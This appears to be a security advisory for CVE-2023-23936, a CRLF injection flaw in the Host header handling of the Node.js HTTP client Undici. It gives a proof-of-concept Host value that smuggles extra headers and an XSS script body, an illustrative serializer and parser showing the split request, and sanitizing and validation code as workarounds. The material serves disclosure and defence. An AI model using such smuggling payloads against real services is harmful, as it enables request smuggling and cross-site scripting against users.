A vulnerability (CVE-2023-23936) has been disclosed in Undici, a fast HTTP/1.1 client for Node.js: the library does not protect the Host request header against CRLF (Carriage Return Line Feed) injection. Versions 2.0.0 up to and including 5.19.0 are affected. A patch has been released in Undici v5.19.1.
Vulnerability Details
In versions 2.0.0 through 5.19.0, Undici writes the value of headers.host to the connection without rejecting carriage-return or line-feed characters. If an application builds that value from untrusted input, an attacker can terminate the Host line early and append further header lines, a body, or the beginning of a second request. That is the basis of HTTP request smuggling and, where the injected content is later reflected by the server, of response splitting and cross-site scripting. Which of these is reachable depends on how the upstream server and any intermediaries parse the resulting byte stream; the library-level defect is simply that the injected CRLF sequences reach the wire intact.
Here is a simple code snippet demonstrating the vulnerability:

    const { request } = require('undici');

    const options = {
      origin: 'http://localhost:3000',
      path: '/',
      method: 'GET',
      headers: {
        // The CRLF sequences end the Host line early; a vulnerable Undici sends
        // the remainder as further header lines, a blank line, and a trailing payload.
        host: 'localhost:3000\r\nContent-Length: 0\r\nContent-Type: text/html\r\n\r\n<script>alert("XSS")</script>',
      },
    };

    request(options).then(({ statusCode, headers, body }) => {
      console.log('response', statusCode, headers);
      body.setEncoding('utf8');
      body.pipe(process.stdout);
    });
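To make concrete what the snippet above puts on the wire, here is an added example (not Undici's code, and not from the original page) consisting of a deliberately naive HTTP/1.1 request serializer that trusts header values verbatim, the same trust an unpatched client places in headers.host, together with a minimal server-side header parser. Running the page's Host payload through both shows what a server actually sees; the serializer, parser and the extra "user-agent" header are assumptions made for the illustration.

```javascript
// Added example: how a CRLF-bearing Host value splits an HTTP/1.1 request.
// The serializer and parser below are illustrative, not Undici's or Node's code.
const CRLF = '\r\n';

// Naive request serializer: header values are written verbatim, so a value
// containing CRLF produces additional lines on the wire.
function serializeRequest(method, path, headers) {
  const lines = [`${method} ${path} HTTP/1.1`];
  for (const [name, value] of Object.entries(headers)) {
    lines.push(`${name}: ${value}`);
  }
  return lines.join(CRLF) + CRLF + CRLF;
}

// Minimal server-side parser: the request head ends at the first blank line,
// header names are lower-cased, and whatever follows the blank line is
// returned as `rest` (body and/or the start of a pipelined request).
function parseRequestHead(raw) {
  const end = raw.indexOf(CRLF + CRLF);
  const head = end === -1 ? raw : raw.slice(0, end);
  const rest = end === -1 ? '' : raw.slice(end + 4);
  const [requestLine, ...headerLines] = head.split(CRLF);
  const headers = {};
  for (const line of headerLines) {
    const idx = line.indexOf(':');
    if (idx === -1) continue; // not a header line; a real parser would reject it
    headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  return { requestLine, headers, rest };
}

// Constructed payload with the same shape as the one in the vulnerable snippet.
const PAYLOAD_HOST =
  'localhost:3000\r\nContent-Length: 0\r\nContent-Type: text/html\r\n\r\n<script>alert("XSS")</script>';

// Serialize a request whose Host comes from the caller, then parse it the way
// a server would. A second, legitimate header is included to show it being
// displaced past the injected blank line.
function demo(hostValue = PAYLOAD_HOST) {
  const raw = serializeRequest('GET', '/', {
    host: hostValue,
    'user-agent': 'demo-client',
  });
  return parseRequestHead(raw);
}

const seen = demo();
console.log('server-side headers:', seen.headers);
console.log('bytes after the request head:', JSON.stringify(seen.rest));
```

With the payload, the server's header table contains Content-Length: 0 and Content-Type: text/html as if the application had sent them, the legitimate User-Agent line has been pushed past the blank line and is no longer a header, and the script text sits exactly where a pipelined second request would begin. With a plain "localhost:3000" the same code yields two headers and nothing after the head.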
Solution and Mitigation
The vulnerability has been patched in Undici version 5.19.1. If you are on an affected version, upgrade to v5.19.1 or later.
For those who cannot upgrade immediately, the workaround is to sanitize the headers.host string before passing it to Undici. Stripping CR and LF is the minimum: it prevents the line break, but it silently keeps whatever followed the break as part of the host value, so where the application can return an error instead, rejecting any value that contains these characters is preferable. Here's the strip-based version:

    function sanitizeHostHeader(hostHeader) {
      // Remove every CR and LF so the value cannot end the Host line early.
      return hostHeader.replace(/[\r\n]+/g, '');
    }

    // unsafeHostHeader holds a host value derived from untrusted input.
    const sanitaryHostHeader = sanitizeHostHeader(unsafeHostHeader);
    options.headers.host = sanitaryHostHeader;
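As an added example (not code from the page or from the Undici project), the following validates a caller-supplied Host value instead of only stripping CR/LF from it. The INVALID_HEADER_CHAR pattern is modelled on the character class Node's http module rejects in header values; the HOST_RE pattern is an assumption that accepts a registered name or IPv4 literal, or a bracketed IPv6 literal, with an optional port, which is the Host = uri-host [ ":" port ] grammar of RFC 9110. The test values are constructed.

```javascript
// Added example: reject, rather than strip, a Host value that is not a valid
// uri-host [":" port]. Not Undici's code; the patterns are illustrative.

// Modelled on the character class Node's http module rejects in any header
// value: anything outside HTAB, printable ASCII and 0x80-0xff. CR (0x0d)
// and LF (0x0a) fall outside it, so any CRLF injection attempt fails here.
const INVALID_HEADER_CHAR = /[^\t\x20-\x7e\x80-\xff]/;

// Host = uri-host [ ":" port ] (RFC 9110, section 7.2). Assumed grammar: a
// registered name or IPv4 literal (unreserved, pct-encoded and sub-delims
// characters), or a bracketed IPv6 literal, optionally followed by ":" and
// one to five digits. The port range is checked separately.
const HOST_RE = /^(?:\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9._~%!$&'()*+,;=-]+)(?::\d{1,5})?$/;

function isSafeHeaderValue(value) {
  return typeof value === 'string' && !INVALID_HEADER_CHAR.test(value);
}

// True only for a syntactically valid Host value whose port, if any, is 0-65535.
function isValidHostHeader(value) {
  if (!isSafeHeaderValue(value) || !HOST_RE.test(value)) return false;
  const port = /:(\d{1,5})$/.exec(value); // does not match a bare "[::1]"
  return port === null || Number(port[1]) <= 65535;
}

// Use at the boundary where untrusted input becomes headers.host: throwing
// lets the caller return an error instead of sending a mangled request.
function validateHostHeader(value) {
  if (!isValidHostHeader(value)) {
    throw new TypeError(`invalid Host header value: ${JSON.stringify(value)}`);
  }
  return value;
}

// Constructed payload, the same shape as the one in the vulnerable snippet.
const CRLF_PAYLOAD =
  'localhost:3000\r\nContent-Length: 0\r\nContent-Type: text/html\r\n\r\n<script>alert("XSS")</script>';

// What a strip-only workaround produces: no line breaks, but still not a host.
const STRIPPED_PAYLOAD = CRLF_PAYLOAD.replace(/[\r\n]+/g, '');

for (const candidate of ['localhost:3000', '[::1]:8080', 'example.com:99999', CRLF_PAYLOAD, STRIPPED_PAYLOAD]) {
  console.log(JSON.stringify(candidate).slice(0, 40), '->', isValidHostHeader(candidate));
}
```

Note that the stripped payload still fails validation: removing CR and LF leaves "localhost:3000Content-Length: 0Content-Type: ..." which is not a host at all, so the strip-only workaround would have forwarded a nonsense Host header where validation refuses it.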
References
1. Undici - HTTP/1.1 client for Node.js
2. GitHub Issue - CRLF Injection vulnerability with host header
3. CVE-2023-23936 - Vulnerability Details
Conclusion
If you are using Undici in your Node.js applications, either upgrade to v5.19.1 or later or apply the workaround above, and treat any value that ends up in headers.host as untrusted input that must be validated. Doing so closes off CRLF injection through the Host header and makes your applications safer for their users.
Timeline
Published on: 02/16/2023 18:15:00 UTC
Last modified on: 02/24/2023 19:14:00 UTC